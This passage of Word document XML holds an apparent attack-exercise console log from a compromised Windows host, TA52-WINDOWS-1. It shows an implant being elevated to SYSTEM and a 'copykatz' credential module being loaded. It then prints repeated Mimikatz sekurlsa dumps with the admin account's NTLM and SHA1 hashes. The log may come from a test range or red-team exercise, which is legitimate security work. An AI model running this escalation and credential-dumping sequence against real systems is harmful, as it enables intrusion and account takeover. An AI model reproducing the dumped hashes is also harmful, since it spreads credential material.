    <w:p w14:paraId="6DFC9EB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MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F60DF0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W1         128.55.12.76:50736 --&gt;   128.55.12.233:443   [HTTP]  Wed May  8 15:14:09 2019        active 15s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125879E4" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6748E6B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5:15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C7A78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getpid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70722CC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pid: 8412</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672D70A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elevatepid '\\.\sysmon' 8412</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5547180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levate process [\\.\sysmon] [8412]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23716CD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elevate success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5169DCC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whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6546D81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SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DCCD7C" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C3F3C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5:15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366CCC9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module copykatz /e5/deploy/copykatz.windows.x64.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F0F9B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module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A8EB4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C56B7B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   name   | library                             | deployed |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D1E44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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202F75F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 copykatz | /e5/deploy/copykatz.windows.x64.dll |    0     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CDA6C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0784DC0B" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EFA561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5:16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C627E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deploy copykatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F6419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Loading module /e5/deploy/copykatz.windows.x64.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723FABF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deploy success [copykatz] [/e5/deploy/copykatz.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB5796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 register success [copykatz] [/e5/deploy/copykatz.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFF275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register success [copykatz] [/e5/deploy/copykatz.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A94A33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register success [copykatz] [/e5/deploy/copykatz.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7346962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register success [copykatz] [/e5/deploy/copykatz.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FB24D7" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EC141D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pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1706D68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C:\Program Files\mozilla\firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C61C11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cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D38FEA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cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8DECD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cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C2BE7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pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B12432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C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A65002" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="155842B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5:17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7603D56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cd Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1E740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cd admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0755555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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB85BB9" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA3B5F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5:19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398915B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enable_logfile C:\\Users\\admin\\pulley</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B128B1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copykatz.enable_logfile returned success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716E85A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get_passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380A86D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copykatz.get_passwords returned success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E426C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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AF472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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54496DD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pulley</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2008E19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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC37F67" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59FB5D9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3:20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B418B0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cat pulley</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7E342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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A2812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FILE(C:\Users\admin\pulley) LOGGING IS ENABLED  ****</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05415A43" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37306C7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STARTING MIMIKATZ SEKURLSA PASSWORDS MODULE *****</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BD1C6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Privilege '20' OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF807E5" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2253998F" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C36D3B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uthentication Id : 0 ; 24879025 (00000000:017b9fb1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6532B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lastRenderedPageBreak/>
        <w:t>Session           : NetworkCleartext from 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B56FCC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User Name         : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032C52E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Domain            : TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567473D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ogon Server      : TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8D648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ogon Time        : 5/8/2019 3:18:43 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6756D3A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ID               : S-1-5-21-231540947-922634896-4161786520-1005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09029F7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msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AD2E8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00000003] Primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DE48F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name : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A1B20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 TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3773E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NTLM     : 2b98b46fce607ebc2527666dc95cbecc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C66826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SHA1     : cf2a0e59c8dfd16e1064ecacbd74d50ddbfe4beb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A6155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tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458E907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wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0948EC7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name : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA5474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 TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AC871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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC894A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kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC26E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name : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6C7FF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 TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03754A9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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BA8CD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ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BA111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credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2E51EF" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="150A089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uthentication Id : 0 ; 17321071 (00000000:01084c6f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF8E06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ession           : NetworkCleartext from 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C67F5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User Name         : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040F892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Domain            : TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630DED5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ogon Server      : TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28562D3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ogon Time        : 5/8/2019 2:51:04 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1098C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ID               : S-1-5-21-231540947-922634896-4161786520-1005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C2CEC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msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C84A8F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00000003] Primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6853472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name : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDC7B5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 TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E74242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NTLM     : 2b98b46fce607ebc2527666dc95cbecc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789BAF7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SHA1     : cf2a0e59c8dfd16e1064ecacbd74d50ddbfe4beb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A6D37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tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260BBD2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wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B65104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name : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2D948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 TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A910F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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFC6D2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kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F37B0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name : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C2C46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 TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F5AAF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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAC8FC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ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0313F10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credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1159A7" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A92E8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uthentication Id : 0 ; 2174833 (00000000:00212f71)                                                                                                                                                                                                                                                                               [195/1940]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406B50E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ession           : NetworkCleartext from 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700C8A6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User Name         : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C26B0B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Domain            : TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63563CE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ogon Server      : TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6BAE1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ogon Time        : 5/8/2019 2:12:54 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040223A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ID               : S-1-5-21-231540947-922634896-4161786520-1005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611DED1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msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541E8DF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00000003] Primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3339E09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name : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E69540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 TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CA38B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NTLM     : 2b98b46fce607ebc2527666dc95cbecc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEF5F1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SHA1     : cf2a0e59c8dfd16e1064ecacbd74d50ddbfe4beb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032094B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tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F5ADF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wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531E7CE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name : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AB451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lastRenderedPageBreak/>
        <w:t xml:space="preserve">         * Domain   : TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C85AD7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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5D681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kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6FA99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name : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCA51F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 TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB71C1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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE64E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ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49316F7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credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088D427B" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E3C28E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uthentication Id : 0 ; 266486 (00000000:000410f6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F9CC9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ession           : Interactive from 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2A3F7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User Name         : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D212E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Domain            : TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672ACFE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ogon Server      : TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7076910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ogon Time        : 5/8/2019 2:09:07 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA7B28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ID               : S-1-5-21-231540947-922634896-4161786520-1005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F77F8C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msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288F8BB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00000003] Primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EF9F6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name : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C32DE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 TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC4B79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NTLM     : 2b98b46fce607ebc2527666dc95cbecc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC39FA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SHA1     : cf2a0e59c8dfd16e1064ecacbd74d50ddbfe4beb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD193E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tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5522E50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wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B8D95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name : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C76C75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 TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CAC55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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3501D8B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kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E31E0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name : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E04961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 TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FEC12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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843E1A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ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F33EB1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credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CF29D4" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7784545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uthentication Id : 0 ; 266448 (00000000:000410d0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA4CC3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ession           : Interactive from 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B842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User Name         : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7949465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Domain            : TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1BB18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ogon Server      : TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4077282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ogon Time        : 5/8/2019 2:09:07 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364BD69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ID               : S-1-5-21-231540947-922634896-4161786520-1005</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1673BC0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msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7100AD8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00000003] Primary                                                                                                                                                                                                                                                                                                       [137/1940]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420E309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name : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356A15C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 TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D12FE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NTLM     : 2b98b46fce607ebc2527666dc95cbecc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1126AF5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SHA1     : cf2a0e59c8dfd16e1064ecacbd74d50ddbfe4beb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142280D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tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB4995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wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6B2FB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name : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24115CA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 TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491CA48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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE170F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kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B69E7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name : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EA686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 TA52-WINDOWS-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B3956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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2477586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ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1188166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credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD142B8" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72F94EA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uthentication Id : 0 ; 123898 (00000000:0001e3fa)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614A62C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ession           : Service from 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBB987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User Name         : SSHD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D443C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Domain            : NT SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A39E90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ogon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AACF44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ogon Time        : 5/8/2019 2:08:58 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0823252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lastRenderedPageBreak/>
        <w:t>SID               : S-1-5-80-3847866527-469524349-687026318-516638107-1125189541</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4754095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msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF79B8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tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F16A87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wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4348D09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name : TA52-WINDOWS-1$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B770D0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 WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013B3C5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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58862F3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kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECF375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ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8BC7E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credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33817A1C" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="093641B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uthentication Id : 0 ; 997 (00000000:000003e5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0182DBA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ession           : Service from 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1431399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User Name         : LOCAL SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F79FD0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Domain            : NT AUTHORITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EC4E2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ogon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157FA35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ogon Time        : 5/8/2019 2:08:56 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA9DA4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ID               : S-1-5-19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B28C7C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msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668567F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tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F2A25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wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A7FC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name : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5614DA8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 (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7910095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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774427F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kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBD762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name : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6AD77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 (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD9B30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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B5B42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ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CC7D1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credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E7445B" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713613A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uthentication Id : 0 ; 47377 (00000000:0000b911)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429DABA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ession           : Interactive from 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CF6E1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User Name         : DWM-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BFB10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Domain            : Window Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F6AA9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ogon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFA347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ogon Time        : 5/8/2019 2:08:55 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBCD25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ID               : S-1-5-90-0-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DE242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msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1DD03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tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C8FAD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wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4ABF9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name : TA52-WINDOWS-1$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A4453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 WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64002E8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assword : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7605482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kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AD137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ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CFE72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credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE4F00E" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CDA3E3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uthentication Id : 0 ; 47340 (00000000:0000b8ec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9100C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ession           : Interactive from 1</w:t>
      </w:r>
    </w:p>
